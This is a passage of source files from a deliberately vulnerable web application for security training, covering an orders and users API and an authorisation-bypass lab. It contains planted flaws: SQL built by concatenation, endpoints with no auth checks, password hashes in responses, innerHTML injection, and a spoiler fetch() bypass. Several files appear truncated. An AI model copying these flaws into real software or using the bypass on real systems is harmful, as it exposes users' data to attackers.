OrderUpdate\n{\n #[OAT\\Property(example: \"fred\")]\n public string $name;\n\n #[OAT\\Property(example: \"1 High Street, Atown\")]\n public string $address;\n\n #[OAT\\Property(example: \"2 * brushes\")]\n public string $items;\n}\n" }, { "path": "vulnerabilities/api/src/OrderController.php", "content": "data = array (\n\t\t\t1 => new Order (1, \"Tony\", \"BBC Television Centre, London W3 6XZ\", \"5 * brushes\", 0),\n\t\t\t2 => new Order (2, \"Morph\", \"Wooden Box, Corner of the table, The Studio\", \"plasticine\", 0),\n\t\t\t3 => new Order (3, \"Nailbrush\", \"BBC Television Centre, London W3 6XZ\", \"Spare bristles\", 1),\n\t\t);\n\t\t$this->requestMethod = $requestMethod;\n\t\t$this->orderId = $orderId;\n\t\t$this->version = $version;\n\t}\n\n\tprivate function checkToken() {\n\t\tif (array_key_exists (\"HTTP_AUTHORIZATION\", $_SERVER)) {\n\t\t\t$header = $_SERVER['HTTP_AUTHORIZATION'];\n\t\t\t$bits = explode (\" \", $header);\n\t\t\tif (count ($bits) == 2) {\n\t\t\t\tif (strtolower($bits[0]) == \"bearer\") {\n\t\t\t\t\treturn (Login::check_access_token($bits[1]));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\treturn false;\n\t}\n\n\tprivate function validateAdd($input)\n\t{\n\t\tif (! isset($input['name'])) {\n\t\t\treturn false;\n\t\t}\n\t\tif (! isset($input['address'])) {\n\t\t\treturn false;\n\t\t}\n\t\tif (! isset($input['items'])) {\n\t\t\treturn false;\n\t\t}\n\t\treturn true;\n\t}\n\n\tprivate function validateUpdate($input)\n\t{\n\t\tif (isset($input['name']) || isset($input['address']) || isset ($input['items'])) {\n\t\t\treturn true;\n\t\t}\n\t\treturn false;\n\t}\n\n\t/*\n\ttype can be \"http\", \"apiKey\", \"oauth2\", \"openIdConnect\" \n\t* https://zircote.github.io/swagger-php/guide/cookbook.html#referencing-a-security-scheme\n\t*/\n\n\t#[OAT\\SecurityScheme(\n\t\tname :\"authorization\",\n\t\tsecurityScheme :\"http\",\n\t\ttype :\"http\",\n\t)\n\t]\n\n #[OAT\\Get(\n\t\ttags: [\"order\"],\n path: '/vulnerabilities/api/v2/order/{id}',\n operationId: 'getOrderByID',\n\t\tdescription: 'Get a order by ID.',\n\t\tsecurity: [ \"basicAuth\" ],\n parameters: [\n new OAT\\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\\Schema(type: 'integer')),\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n content: new OAT\\JsonContent (ref: '#/components/schemas/Order'),\n\n ),\n new OAT\\Response(\n response: 404,\n description: 'Order not found.',\n ),\n ]\n ) \n ] \n\t\n\tprivate function getOrder($id)\n\t{\n\t\tif (!$this->checkToken()) {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid or missing token\"));\n\t\t\treturn $response;\n\t\t}\n\n\t\tif (!array_key_exists ($id, $this->data)) {\n\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = json_encode ($this->data[$id]->toArray($this->version));\n\t\treturn $response;\n\t}\t\n\n #[OAT\\Get(\n\t\ttags: [\"order\"],\n path: '/vulnerabilities/api/v2/order/',\n operationId: 'getOrders',\n\t\tdescription: 'Get all orders.',\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n content: new OAT\\JsonContent(\n type: 'array',\n items: new OAT\\Items(ref: '#/components/schemas/Order')\n )\n ),\n ]\n ) \n ] \n\n\tprivate function getAllOrders() {\n\t\tif (!$this->checkToken()) {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid or missing token\"));\n\t\t\treturn $response;\n\t\t}\n\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$all = array();\n\t\tforeach ($this->data as $order) {\n\t\t\t$all[] = $order->toArray($this->version);\n\t\t}\n\t\t$response['body'] = json_encode($all);\n\t\treturn $response;\n\t}\n\n #[OAT\\Post(\n\t\ttags: [\"order\"],\n path: '/vulnerabilities/api/v2/order/',\n operationId: 'addOrder',\n\t\tdescription: 'Create a new order.',\n parameters: [\n new OAT\\RequestBody (\n\t\t\t\t\tdescription: 'Order data.',\n content: new OAT\\MediaType(\n mediaType: 'application/json',\n schema: new OAT\\Schema(ref: OrderAdd::class)\n )\n ),\n\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n content: new OAT\\JsonContent (ref: '#/components/schemas/Order'),\n ),\n new OAT\\Response(\n response: 422,\n description: 'Invalid order object provided',\n ),\n ]\n ) \n ] \n\n\tprivate function addOrder()\n\t{\n\t\tif (!$this->checkToken()) {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid or missing token\"));\n\t\t\treturn $response;\n\t\t}\n\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (! $this->validateAdd($input)) {\n\t\t\t$gc = new GenericController(\"unprocessable\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\t$order = new Order(null, $input['name'], $input['address'], $input['items'], 0);\n\t\t$this->data[] = $order;\n\t\t$response['status_code_header'] = 'HTTP/1.1 201 Created';\n\t\t$response['body'] = json_encode($order->toArray($this->version));\n\t\treturn $response;\n\t}\n\n #[OAT\\Put(\n\t\ttags: [\"order\"],\n path: '/vulnerabilities/api/v2/order/{id}',\n operationId: 'updateOrder',\n\t\tdescription: 'Update an order by ID.',\n parameters: [\n new OAT\\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\\Schema(type: 'integer')),\n new OAT\\RequestBody (\n\t\t\t\t\tdescription: 'New order data.',\n content: new OAT\\MediaType(\n mediaType: 'application/json',\n schema: new OAT\\Schema(ref: OrderUpdate::class)\n )\n ),\n\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n content: new OAT\\JsonContent (ref: '#/components/schemas/Order'),\n ),\n new OAT\\Response(\n response: 404,\n description: 'Order not found',\n ),\n new OAT\\Response(\n response: 422,\n description: 'Invalid order object provided',\n ),\n ]\n ) \n ] \n\t\n\tprivate function updateOrder($id)\n\t{\n\t\tif (!$this->checkToken()) {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid or missing token\"));\n\t\t\treturn $response;\n\t\t}\n\n\t\tif (!array_key_exists ($id, $this->data)) {\n\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (! $this->validateUpdate($input)) {\n\t\t\t$gc = new GenericController(\"unprocessable\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\tif (array_key_exists (\"name\", $input)) {\n\t\t\t$this->data[$id]->name = $input['name'];\n\t\t}\n\t\tif (array_key_exists (\"address\", $input)) {\n\t\t\t$this->data[$id]->address = $input['address'];\n\t\t}\n\t\tif (array_key_exists (\"items\", $input)) {\n\t\t\t$this->data[$id]->items = $input['items'];\n\t\t}\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = json_encode ($this->data[$id]->toArray($this->version));\n\t\treturn $response;\n\t}\t\n\n #[OAT\\Delete(\n\t\ttags: [\"order\"],\n path: '/vulnerabilities/api/v2/order/{id}',\n operationId: 'deleteOrderById',\n\t\tdescription: 'Delete order by ID.',\n parameters: [\n new OAT\\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\\Schema(type: 'integer')),\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n ),\n new OAT\\Response(\n response: 404,\n description: 'Order not found',\n ),\n ]\n ) \n ] \n\t\n\tprivate function deleteOrder($id) {\n\t\tif (!$this->checkToken()) {\n\t\t\t$response['status_code_header'] = 'HTTP/1.1 401 Unauthorized';\n\t\t\t$response['body'] = json_encode (array (\"status\" => \"Invalid or missing token\"));\n\t\t\treturn $response;\n\t\t}\n\n\t\tif (!array_key_exists ($id, $this->data)) {\n\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\tunset ($this->data[$id]);\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = null;\n\t\treturn $response;\n\t}\n\n\tpublic function processRequest() {\n\t\tswitch ($this->requestMethod) {\n\t\t\tcase 'GET':\n\t\t\t\tif (isset ($this->orderId) && is_numeric ($this->orderId)) {\n\t\t\t\t\t$response = $this->getOrder($this->orderId);\n\t\t\t\t} else {\n\t\t\t\t\t$response = $this->getAllOrders();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase 'POST':\n\t\t\t\t$response = $this->addOrder();\n\t\t\t\tbreak;\n\t\t\tcase 'PUT':\n\t\t\t\t$response = $this->updateOrder($this->orderId);\n\t\t\t\tbreak;\n\t\t\tcase 'DELETE':\n\t\t\t\t$response = $this->deleteOrder($this->orderId);\n\t\t\t\tbreak;\n\t\t\tcase 'OPTIONS':\n\t\t\t\t$gc = new GenericController(\"options\");\n\t\t\t\t$gc->processRequest();\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t$gc = new GenericController(\"notSupported\");\n\t\t\t\t$gc->processRequest();\n\t\t\t\texit();\n\t\t\t\tbreak;\n\t\t}\n\t\theader($response['status_code_header']);\n\t\tif ($response['body']) {\n\t\t\techo $response['body'];\n\t\t}\n\t}\n}\n" }, { "path": "vulnerabilities/api/src/Token.php", "content": " $secret,\n\t\t\t\t\t\t\"expires\" => $expires,\n\t\t\t\t\t)));\n\t\treturn $token;\n\t}\n\n\tpublic function decrypt_token($token) {\n\t\t$decrypted = self::decrypt($token);\n\n\t\tif ($decrypted === false) {\n\t\t\treturn false;\n\t\t}\n\n\t\t$token = json_decode ($decrypted, true);\n\t\treturn $token;\n\t}\n}\n\n?>\n" }, { "path": "vulnerabilities/api/src/User.php", "content": "id = $id;\n\t\t$this->name = $name;\n\t\t$this->level = $level;\n\t\t$this->password = $password;\n\t}\n\n\tpublic function toArray($version) {\n\t\tswitch ($version) {\n\t\t\tcase 1:\n\t\t\t\t$a = array (\n\t\t\t\t\t\"id\" => $this->id,\n\t\t\t\t\t\"name\" => $this->name,\n\t\t\t\t\t\"level\" => $this->level,\n\t\t\t\t\t\"password\" => $this->password,\n\t\t\t\t);\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\tcase 2:\n\t\t\t\t$a = array (\n\t\t\t\t\t\"id\" => $this->id,\n\t\t\t\t\t\"name\" => $this->name,\n\t\t\t\t\t\"level\" => $this->level,\n\t\t\t\t);\n\t\t\t\tbreak;\n\t\t}\n\n\t\treturn $a;\n\t}\n}\n\n#[OAT\\Schema(required: ['level', 'name'])]\nfinal class UserAdd\n{\n #[OAT\\Property(example: \"fred\")]\n public string $name;\n\n #[OAT\\Property(type: 'integer', example: 1)]\n public string $level;\n}\n\n#[OAT\\Schema(required: ['name'])]\nfinal class UserUpdate\n{\n #[OAT\\Property(example: \"fred\")]\n public string $name;\n}\n" }, { "path": "vulnerabilities/api/src/UserController.php", "content": "data = array (\n\t\t\t1 => new User (1, \"tony\", 0, '1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032'),\n\t\t\t2 => new User (2, \"morph\", 1, 'e5326ba4359f77c2623244acb04f6ac35c4dfca330ebcccdf9b734e5b1df90a8'),\n\t\t\t3 => new User (3, \"chas\", 1, 'a89237fc1f9dd8d424d8b8b98b890dbc4a817bfde59af17c39debcc4a14c21de'),\n\t\t);\n\t\t$this->requestMethod = $requestMethod;\n\t\t$this->userId = $userId;\n\t\t$this->version = $version;\n\t}\n\n\tprivate function validateAdd($input)\n\t{\n\t\tif (! isset($input['name'])) {\n\t\t\treturn false;\n\t\t}\n\t\tif (! isset($input['level'])) {\n\t\t\treturn false;\n\t\t}\n\t\tif (!is_numeric ($input['level'])) {\n\t\t\treturn false;\n\t\t}\n\t\treturn true;\n\t}\n\n\tprivate function validateUpdate($input)\n\t{\n\t\tif (! isset($input['name'])) {\n\t\t\treturn false;\n\t\t}\n\t\treturn true;\n\t}\n\n #[OAT\\Get(\n\t\ttags: [\"user\"],\n path: '/vulnerabilities/api/v2/user/{id}',\n operationId: 'getUserByID',\n\t\tdescription: 'Get a user by ID.',\n parameters: [\n new OAT\\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\\Schema(type: 'integer')),\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n content: new OAT\\JsonContent (ref: '#/components/schemas/User'),\n\n ),\n new OAT\\Response(\n response: 404,\n description: 'User not found.',\n ),\n ]\n ) \n ] \n\t\n\tprivate function getUser($id)\n\t{\n\t\tif (!array_key_exists ($id, $this->data)) {\n\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = json_encode ($this->data[$id]->toArray($this->version));\n\t\treturn $response;\n\t}\t\n\n #[OAT\\Get(\n\t\ttags: [\"user\"],\n path: '/vulnerabilities/api/v2/user/',\n operationId: 'getUsers',\n\t\tdescription: 'Get all users.',\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n content: new OAT\\JsonContent(\n type: 'array',\n items: new OAT\\Items(ref: '#/components/schemas/User')\n )\n ),\n ]\n ) \n ] \n\n\tprivate function getAllUsers() {\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$all = array();\n\t\tforeach ($this->data as $user) {\n\t\t\t$all[] = $user->toArray($this->version);\n\t\t}\n\t\t$response['body'] = json_encode($all);\n\t\treturn $response;\n\t}\n\n #[OAT\\Post(\n\t\ttags: [\"user\"],\n path: '/vulnerabilities/api/v2/user/',\n operationId: 'addUser',\n\t\tdescription: 'Create a new user.',\n parameters: [\n new OAT\\RequestBody (\n\t\t\t\t\tdescription: 'User data.',\n content: new OAT\\MediaType(\n mediaType: 'application/json',\n schema: new OAT\\Schema(ref: UserAdd::class)\n )\n ),\n\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n content: new OAT\\JsonContent (ref: '#/components/schemas/User'),\n ),\n new OAT\\Response(\n response: 422,\n description: 'Invalid user object provided',\n ),\n ]\n ) \n ] \n\n\tprivate function addUser()\n\t{\n\t\t$ret = Helpers::check_content_type();\n\t\tif ($ret !== true) {\n\t\t\treturn $ret;\n\t\t}\n\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (! $this->validateAdd($input)) {\n\t\t\t$gc = new GenericController(\"unprocessable\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\t$user = new User(null, $input['name'], intval ($input['level']), hash (\"sha256\", \"password\"));\n\t\t$this->data[] = $user;\n\t\t$response['status_code_header'] = 'HTTP/1.1 201 Created';\n\t\t$response['body'] = json_encode($user->toArray($this->version));\n\t\treturn $response;\n\t}\n\n #[OAT\\Put(\n\t\ttags: [\"user\"],\n path: '/vulnerabilities/api/v2/user/{id}',\n operationId: 'updateUser',\n\t\tdescription: 'Update a user by ID.',\n parameters: [\n new OAT\\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\\Schema(type: 'integer')),\n new OAT\\RequestBody (\n\t\t\t\t\tdescription: 'New user data.',\n content: new OAT\\MediaType(\n mediaType: 'application/json',\n schema: new OAT\\Schema(ref: UserUpdate::class)\n )\n ),\n\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n content: new OAT\\JsonContent (ref: '#/components/schemas/User'),\n ),\n new OAT\\Response(\n response: 404,\n description: 'User not found',\n ),\n new OAT\\Response(\n response: 422,\n description: 'Invalid user object provided',\n ),\n ]\n ) \n ] \n\t\n\tprivate function updateUser($id)\n\t{\n\t\tif (!array_key_exists ($id, $this->data)) {\n\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\t$input = (array) json_decode(file_get_contents('php://input'), TRUE);\n\t\tif (! $this->validateUpdate($input)) {\n\t\t\t$gc = new GenericController(\"unprocessable\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\tif (array_key_exists (\"name\", $input)) {\n\t\t\t$this->data[$id]->name = $input['name'];\n\t\t}\n\t\tif (array_key_exists (\"level\", $input)) {\n\t\t\t$this->data[$id]->level = intval ($input['level']);\n\t\t}\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = json_encode ($this->data[$id]->toArray($this->version));\n\t\treturn $response;\n\t}\t\n\n #[OAT\\Delete(\n\t\ttags: [\"user\"],\n path: '/vulnerabilities/api/v2/user/{id}',\n operationId: 'deleteUserById',\n\t\tdescription: 'Delete user by ID.',\n parameters: [\n new OAT\\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\\Schema(type: 'integer')),\n ],\n responses: [\n new OAT\\Response(\n response: 200,\n description: 'Successful operation.',\n ),\n new OAT\\Response(\n response: 404,\n description: 'User not found',\n ),\n ]\n ) \n ] \n\t\n\tprivate function deleteUser($id) {\n\t\tif (!array_key_exists ($id, $this->data)) {\n\t\t\t$gc = new GenericController(\"notFound\");\n\t\t\t$gc->processRequest();\n\t\t\texit();\n\t\t}\n\t\tunset ($this->data[$id]);\n\t\t$response['status_code_header'] = 'HTTP/1.1 200 OK';\n\t\t$response['body'] = null;\n\t\treturn $response;\n\t}\n\n\tpublic function processRequest() {\n\t\tswitch ($this->requestMethod) {\n\t\t\tcase 'GET':\n\t\t\t\tif ($this->userId) {\n\t\t\t\t\t$response = $this->getUser($this->userId);\n\t\t\t\t} else {\n\t\t\t\t\t$response = $this->getAllUsers();\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase 'POST':\n\t\t\t\t$response = $this->addUser();\n\t\t\t\tbreak;\n\t\t\tcase 'PUT':\n\t\t\t\t$response = $this->updateUser($this->userId);\n\t\t\t\tbreak;\n\t\t\tcase 'DELETE':\n\t\t\t\t$response = $this->deleteUser($this->userId);\n\t\t\t\tbreak;\n\t\t\tcase 'OPTIONS':\n\t\t\t\t$gc = new GenericController(\"options\");\n\t\t\t\t$gc->processRequest();\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\t$gc = new GenericController(\"notSupported\");\n\t\t\t\t$gc->processRequest();\n\t\t\t\texit();\n\t\t\t\tbreak;\n\t\t}\n\t\theader($response['status_code_header']);\n\t\tif ($response['body']) {\n\t\t\techo $response['body'];\n\t\t}\n\t}\n}\n" }, { "path": "vulnerabilities/authbypass/authbypass.js", "content": "function show_save_result (data) {\n\tif (data.result == 'ok') {\n\t\tdocument.getElementById('save_result').innerText = 'Save Successful';\n\t} else {\n\t\tdocument.getElementById('save_result').innerText = 'Save Failed';\n\t}\n}\n\t\nfunction submit_change(id) {\n\tfirst_name = document.getElementById('first_name_' + id).value\n\tsurname = document.getElementById('surname_' + id).value\n\n\tfetch('change_user_details.php', {\n\t\tmethod: 'POST',\n\t\theaders: {\n\t\t\t'Accept': 'application/json',\n\t\t\t'Content-Type': 'application/json'\n\t\t},\n\t\tbody: JSON.stringify({ 'id': id, 'first_name': first_name, 'surname': surname })\n\t}\n\t)\n\t.then((response) => response.json())\n\t.then((data) => show_save_result(data));\n}\n\nfunction populate_form() {\n\tvar xhr= new XMLHttpRequest();\n\txhr.open('GET', 'get_user_data.php', true);\n\txhr.onreadystatechange= function() {\n\t\tif (this.readyState!==4) {\n\t\t\treturn;\n\t\t}\n\t\tif (this.status!==200) {\n\t\t\treturn;\n\t\t}\n\t\tconst users = JSON.parse (this.responseText);\n\t\ttable_body = document.getElementById('user_table').getElementsByTagName('tbody')[0];\n\t\tusers.forEach(updateTable);\n\n\t\tfunction updateTable (user) {\n\t\t\tvar row = table_body.insertRow(0);\n\t\t\tvar cell0 = row.insertCell(-1);\n\t\t\tcell0.innerHTML = user['user_id'] + '';\n\t\t\tvar cell1 = row.insertCell(1);\n\t\t\tcell1.innerHTML = '';\n\t\t\tvar cell2 = row.insertCell(2);\n\t\t\tcell2.innerHTML = '';\n\t\t\tvar cell3 = row.insertCell(3);\n\t\t\tcell3.innerHTML = '';\n\t\t}\n\t};\n\txhr.send();\n}\n" }, { "path": "vulnerabilities/authbypass/change_user_details.php", "content": " \"fail\", \"error\" => \"Access denied\"));\n\texit;\n}\n\nif ($_SERVER['REQUEST_METHOD'] != \"POST\") {\n\t$result = array (\n\t\t\t\t\t\t\"result\" => \"fail\",\n\t\t\t\t\t\t\"error\" => \"Only POST requests are accepted\"\n\t\t\t\t\t);\n\techo json_encode($result);\n\texit;\n}\n\ntry {\n\t$json = file_get_contents('php://input');\n\t$data = json_decode($json);\n\tif (is_null ($data)) {\n\t\t$result = array (\n\t\t\t\t\t\t\t\"result\" => \"fail\",\n\t\t\t\t\t\t\t\"error\" => 'Invalid format, expecting \"{id: {user ID}, first_name: \"{first name}\", surname: \"{surname}\"}'\n\n\t\t\t\t\t\t);\n\t\techo json_encode($result);\n\t\texit;\n\t}\n} catch (Exception $e) {\n\t$result = array (\n\t\t\t\t\t\t\"result\" => \"fail\",\n\t\t\t\t\t\t\"error\" => 'Invalid format, expecting \\\"{id: {user ID}, first_name: \"{first name}\", surname: \"{surname}\\\"}'\n\n\t\t\t\t\t);\n\techo json_encode($result);\n\texit;\n}\n\n$query = \"UPDATE users SET first_name = '\" . $data->first_name . \"', last_name = '\" . $data->surname . \"' where user_id = \" . $data->id . \"\";\n$result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $query ) or die( '' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\n\nprint json_encode (array (\"result\" => \"ok\"));\nexit;\n?>\n" }, { "path": "vulnerabilities/authbypass/get_user_data.php", "content": " \"fail\", \"error\" => \"Access denied\"));\n\texit;\n}\n\n$query = \"SELECT user_id, first_name, last_name FROM users\";\n$result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $query );\n\n$guestbook = ''; \n$users = array();\n\nwhile ($row = mysqli_fetch_row($result) ) { \n\tif( dvwaSecurityLevelGet() == 'impossible' ) { \n\t\t$user_id = $row[0];\n\t\t$first_name = htmlspecialchars( $row[1] );\n\t\t$surname = htmlspecialchars( $row[2] );\n\t} else {\n\t\t$user_id = $row[0];\n\t\t$first_name = $row[1];\n\t\t$surname = $row[2];\n\t} \n\n\t$user = array (\n\t\t\t\t\t\"user_id\" => $user_id,\n\t\t\t\t\t\"first_name\" => $first_name,\n\t\t\t\t\t\"surname\" => $surname\n\t\t\t\t);\n\t$users[] = $user;\n}\n\nprint json_encode ($users);\nexit;\n?>\n" }, { "path": "vulnerabilities/authbypass/help/help.php", "content": "
\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/authbypass/index.php",
"content": "\r\n\tHelp - Authorisation Bypass
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\t\r\n\t\t\tWhen developers have to build authorisation matrices into complex systems it is easy for them to miss adding the right checks in every place, especially those\r\n\t\t\twhich are not directly accessible through a browser, for example API calls.\r\n\t\t \r\n\r\n\t\t\r\n\t\t\tAs a tester, you need to be looking at every call a system makes and then testing it using every level of user to ensure that the checks are being carried out correctly.\r\n\t\t\tThis can often be a long and boring task, especially with a large matrix with lots of different user types, but it is critical that the testing is carried out as one missed\r\n\t\t\tcheck could lead to an attacker gaining access to confidential data or functions.\r\n\t\t \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tYour goal is to test this user management system at all four security levels to identify any areas where authorisation checks have been missed. \r\n\t\tThe system is only designed to be accessed by the admin user, so have a look at all the calls made while logged in as the admin, and then try to reproduce them while logged in as different user. \r\n\t\tIf you need a second user, you can use gordonb / abc123.\r\n\r\n\t\t \r\n\r\n\t\t Low Level\r\n\t\tNon-admin users do not have the 'Authorisation Bypass' menu option. \r\n\t\tSpoiler: Try browsing directly to /vulnerabilities/authbypass/. \r\n\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThe developer has locked down access to the HTML for the page, but have a look how the page is populated when logged in as the admin. \r\n\t\tSpoiler: Try browsing directly to /vulnerabilities/authbypass/get_user_data.php to access the API which returns the user data for the page. \r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tBoth the HTML page and the API to retrieve data have been locked down, but what about updating data? You have to make sure you test every call to the site. \r\n\t\tSpoiler: GET calls to retrieve data have been locked down but the POST to update the data has been missed, can you figure out how to call it? \r\n\r\n\t\tSpoiler: This is one way to do it: \r\n\r\n\t\tfetch('change_user_details.php', {\r\nmethod: 'POST',\r\nheaders: {\r\n'Accept': 'application/json',\r\n'Content-Type': 'application/json'\r\n},\r\nbody: JSON.stringify({ 'id':1, \"first_name\": \"Harry\", \"surname\": \"Hacker\" })\r\n}\r\n)\r\n.then((response) => response.json())\r\n.then((data) => console.log(data));\r\n\r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\t\r\n\t\t\tHopefully on this level all the functions correctly check authorisation before allowing access to the data.\r\n\t\t \r\n\t\t\r\n\t\t\tThere may however be some non-authorisation related issues on the page, so do not write it off as fully secure.\r\n\t\t \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\n\tReference:
\r\n\tReference:
\r\n\t\r\nVulnerability: Authorisation Bypass
\r\n\r\n\tThis page should only be accessible by the admin user. Your challenge is to gain access to the features using one of the other users, for example gordonb / abc123.
\r\n\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\t
\r\n\r\n\r\n\";\r\n\r\n$page[ 'body' ] .= '\r\n\t\t' . \r\n\t\t$html\r\n\t\t. '\r\n\t
\r\n';\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/authbypass/source/high.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/authbypass/source/impossible.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/authbypass/source/low.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/authbypass/source/medium.php",
"content": "\r\n"
},
{
"path": "vulnerabilities/bac/README.md",
"content": "# Broken Access Control Module - DVWA\n\nThis module demonstrates OWASP Top 10 2021's #1 vulnerability: Broken Access Control (BAC). It provides a practical learning environment showing how access control vulnerabilities can be exploited and properly mitigated.\n\n## Module Overview\n\nThe module simulates a user profile viewing system with progressive security levels:\n\n### Security Levels\n\n#### 1. Low Security\n- Basic input validation for user ID format\n- No access control checks\n- Direct SQL queries without sanitization\n- Vulnerable to SQL injection and unauthorized access\n\n#### 2. Medium Security\n- Input validation for user ID format\n- Basic cookie-based authentication\n- Integer type casting for basic SQL injection protection\n- Vulnerable to cookie manipulation\n\n#### 3. High Security\n- Strict input validation\n- Role-based access control (RBAC)\n- Prepared statements for SQL injection prevention\n- Output encoding to prevent XSS\n- Basic security logging\n- Still vulnerable to certain timing attacks\n\n#### 4. Impossible Security\n- Comprehensive security implementation:\n - Multi-layer input validation\n - Rate limiting\n - Proper RBAC implementation\n - Prepared statements\n - Comprehensive logging\n - Security monitoring\n - Suspicious activity detection\n\n## Common Security Features\n\n1. Input Validation\n - All levels validate user ID format using regex: `/^\\d+$/`\n - Clear error messages for invalid input\n - Additional validation layers in higher security levels\n\n2. Access Control\n - Progressive implementation from none to comprehensive RBAC\n - Session validation\n - Role-based permissions\n\n3. Database Security\n - Progression from raw queries to prepared statements\n - User role management\n - Audit logging capabilities\n\n## Database Schema\n\n```sql\n-- Users table modifications\nALTER TABLE users ADD COLUMN role VARCHAR(20) DEFAULT 'user';\nALTER TABLE users ADD COLUMN account_enabled TINYINT(1) DEFAULT 1;\n\n-- Access logging\nCREATE TABLE access_log (\n id INT AUTO_INCREMENT PRIMARY KEY,\n user_id INT NOT NULL,\n target_id INT NOT NULL,\n action VARCHAR(50) NOT NULL,\n timestamp DATETIME NOT NULL\n);\n\n-- Security monitoring\nCREATE TABLE security_log (\n id INT AUTO_INCREMENT PRIMARY KEY,\n user_id INT NOT NULL,\n action VARCHAR(50) NOT NULL,\n target_id VARCHAR(50),\n timestamp DATETIME NOT NULL,\n ip_address VARCHAR(45)\n);\n```\n\n## Security Testing Guide\n\n1. Input Validation Testing\n - Try non-numeric user IDs\n - Attempt SQL injection\n - Test with special characters\n\n2. Access Control Testing\n - Attempt to view other users' profiles\n - Test admin role functionality\n - Try cookie manipulation\n\n3. Rate Limiting Testing\n - Make multiple rapid requests\n - Test blocking mechanism\n - Verify logging of attempts\n\n## References\n\n- [OWASP Top 10 2021 - A01:2021 Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n- [OWASP Testing Guide - Authorization Testing](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema)\n"
},
{
"path": "vulnerabilities/bac/help/help.php",
"content": "\r\n\t\tWelcome to the user manager, please enjoy updating your user\\'s details.\r\n\t
